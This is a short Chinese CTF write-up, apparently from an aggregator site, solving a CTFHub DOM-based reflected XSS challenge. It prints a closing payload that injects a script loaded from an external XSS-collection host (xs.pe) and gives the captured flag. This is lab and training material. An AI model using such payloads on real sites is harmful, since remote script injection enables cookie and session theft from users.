当前位置: 首页 > news >正文

CTFHUB技能树之XSS——DOM反射

news 2025/5/7 7:09:42

开启靶场,打开链接:

直接指明是DOM反射型的XSS漏洞

右键查看页面源代码,Ctrl F关键词”CTFHub is very“:

可以看到存在xss漏洞

不过得先闭合一下:

闭合例子如下:

';</sCrIpT><sCRiPt sRC=//xs.pe/6b6></sCrIpT><sCRiPt>

(这里还是用TLXSS平台的配置代码)

之后去TLXSS平台中查看获取到的记录,成功获取到flag:

ctfhub{72ff306631e7b12550ad4969}


http://www.mrgr.cn/news/53996.html

相关文章:

  • 从零开始学PHP之helloworld
  • 练习题 - Scrapy爬虫框架 Spider Middleware 爬虫页中间件
  • scrapy案例——链家租房数据的爬取
  • 外部存储器与内部存储器有哪些主要区别
  • [项目详解][boost搜索引擎#1] 概述 | 去标签 | 数据清洗 | scp
  • 【Trick】在vscode上配置copilot时,输出端出现Invalid copilot token: missing token: 403
  • 摩擦转矩摩擦特性曲线测量(详细算法逻辑框图+SCL源代码)
  • 【Mysql】-锁,行级锁
  • 周末总结(2024/10/19)
  • 3.1.1 内核对用户空间的管理2,搜索目标地址所在的节点
  • 【英特尔IA-32架构软件开发者开发手册第3卷:系统编程指南】2001年版翻译,1-10
  • Scrapy | 通过模拟登录功能认识cookies参数及start_requests函数实现发送POST请求
  • Flux.from 使用说明书
  • 功能安全实战系列-软件FEMA分析与组件鉴定
  • 【C语言教程】【嵌入式编程】(一)介绍与前提条件(二)嵌入式编程基础(三)硬件基础知识(四)硬件寄存器操作
  • Linux下进行用户的切换与创建以及细微设置
  • 中华传承-医山命相卜-四柱八字
  • 基于STM32的智能交通灯控制系统设计与实现思路:LoRa、控制算法结合
  • stablediffusion 关于fp32、fp16和fp8是什么 分别有什么区别
  • AcWing1027